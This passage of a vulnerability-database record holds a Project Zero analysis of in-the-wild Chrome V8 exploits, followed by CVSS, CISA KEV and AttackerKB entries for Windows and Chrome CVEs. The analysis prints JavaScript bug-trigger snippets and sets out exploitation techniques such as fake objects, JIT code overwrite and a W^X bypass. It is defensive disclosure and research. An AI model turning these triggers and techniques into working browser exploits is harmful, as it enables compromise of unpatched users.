fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.\n\nThe author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren\u2019t moved by the garbage collector. And, of course, the exploit runs inside a web worker.\n\nHowever, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it\u2019s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.\n\n#### Exploit 2\n\nThe second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit\u2019s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.\n\nThe general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it\u2019s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.\n\nWhile it\u2019s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>).\n\n### 2\\. CVE-2020-6418\n\n#### The vulnerability\n\nThis is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:\n\n'use strict';\n\n(function() {\n\nvar popped;\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\nfunction constructor() {\n\npopped = Array.prototype.pop.call(array);\n\n}\n\nvar temp = array[0];\n\nreturn Reflect.construct(constructor, arguments, new_target);\n\n}\n\ninner(new_target);\n\n}\n\nvar array = new Array(0, 0, 0, 0, 0);\n\nfor (var i = 0; i < 20000; i++) {\n\ntrigger(function() { });\n\narray.push(0);\n\n}\n\nvar proxy = new Proxy(Object, {\n\nget: () => (array[4] = 1.1, Object.prototype)\n\n});\n\ntrigger(proxy);\n\nprint(popped);\n\n}()); \n \n--- \n \nA call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn\u2019t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.\n\nNote that the attacker can\u2019t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.\n\nThis is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline. [The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:\n\nInferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(\n\n[...]\n\nInferReceiverMapsResult result = kReliableReceiverMaps;\n\n[...]\n\ncase IrOpcode::kJSCreate: {\n\nif (IsSame(receiver, effect)) {\n\nbase::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);\n\nif (initial_map.has_value()) {\n\n*maps_return = ZoneHandleSet<Map>(initial_map->object());\n\nreturn result;\n\n}\n\n// We reached the allocation of the {receiver}.\n\nreturn kNoReceiverMaps;\n\n}\n\n+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.\n\nbreak;\n\n}\n\n[...] \n \n--- \n \nThe reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit.\n\n#### Exploit 1\n\nThis time there\u2019s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.\n\nThe exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the \u201cpopped\u201d value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.\n\nThe exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can \u201csurvive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the \u201ctrustworthy\u201d indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.\n\nThe obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.\n\nFinally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.\n\nThe author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn\u2019t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.\n\nThe exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:\n\njit_detector[Symbol.toPrimitive] = function() {\n\nvar stack = (new Error).stack;\n\nif (stack.indexOf(\"Number (\") == -1) {\n\njit_detector.is_compiled = true;\n\n}\n\n};\n\nfunction trigger(array, proxy) {\n\nif (!jit_detector.is_compiled) {\n\nNumber(jit_detector);\n\n}\n\n[...] \n \n--- \n \nDuring compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.\n\nThe exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.\n\n#### Exploit 2\n\nAfter CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\npopped = array.pop(\n\nReflect.construct(function() { }, arguments, new_target));\n\n}\n\ninner(new_target);\n\n} \n \n--- \n \nBy making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.\n\nThe new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn\u2019t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.\n\nThe exploit can\u2019t modify the class body indices directly as they\u2019re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.\n\nThis version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.\n\n#### Exploit 3 & 4\n\nThe actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That\u2019s the only significant change made by the author.\n\nExploit 3 is the only one we\u2019ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.\n\nThe exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.\n\n[The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn\u2019t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.\n\n### 3\\. CVE-2019-5782\n\n### The vulnerability\n\nCVE-2019-5782 is an issue in TurboFan\u2019s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.\n\nNote that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n\nIn this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:\n\noob_index = 100000;\n\nfunction trigger() {\n\nlet array = [1.1, 1.1];\n\nlet index = arguments.length;\n\nindex = index - 65534;\n\nindex = Math.max(index, 0);\n\nreturn array[index] = 2.2;\n\n}\n\nfor (let i = 0; i < 20000; i++) {\n\ntrigger(1,2,3);\n\n}\n\nprint(trigger.apply(null, new Array(65534 + oob_index))); \n \n--- \n \nQixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property.\n\n#### The exploit\n\nThe discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn\u2019t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It\u2019s worth noting that this approach doesn\u2019t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.\n\nInterestingly, this is the only exploit that doesn\u2019t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.\n\nAs the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.\n\nThe public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.\n\n### 4\\. CVE-2019-13764\n\nThis more complex typer issue occurs when TurboFan doesn\u2019t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:\n\nfor (var i = -Infinity; i < 0; i += Infinity) { [...] } \n \n--- \n \nThis vulnerability and exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There\u2019s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.\n\nThe comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn\u2019t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.\n\nIt\u2019s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have \u201crevived\u201d the exploit for CVE-2019-5782.\n\n### Conclusion\n\nThe timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.\n\nIt is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.\n\nThe area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don\u2019t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.\n\nThis is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Chrome Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2019-13764", "CVE-2019-5782", "CVE-2020-6418"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. This CVE ID is unique from CVE-2020-0938.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1020", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. This CVE ID is unique from CVE-2020-1020.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0938", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-6418", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-23T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2022-05-23T00:00:00", "id": "CISA-KEV-CVE-2020-1027", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-08-02T17:31:15", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-0938.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nThis is pretty similar to CVE-2020-1020 and its possible they were used together in a single attack, although for now this is just my theory and without full evidence this should be taken with a healthy few grains of salt.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-1020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-07-22T00:00:00", "id": "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "href": "https://attackerkb.com/topics/IE2z4hqlku/cve-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:28:45", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-1020.\n\n \n**Recent assessments:** \n \n**busterb** at March 24, 2020 12:11pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\n**bac2binary** at April 15, 2020 4:26pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\n**gwillcox-r7** at November 22, 2020 2:24am UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "ADV200006 - Type 1 Font Parsing Remote Code Execution Vulnerability in Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2020-09-02T00:00:00", "id": "AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "href": "https://attackerkb.com/topics/P39wRxHASb/adv200006---type-1-font-parsing-remote-code-execution-vulnerability-in-windows", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:12:59", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 04, 2020 4:42pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain 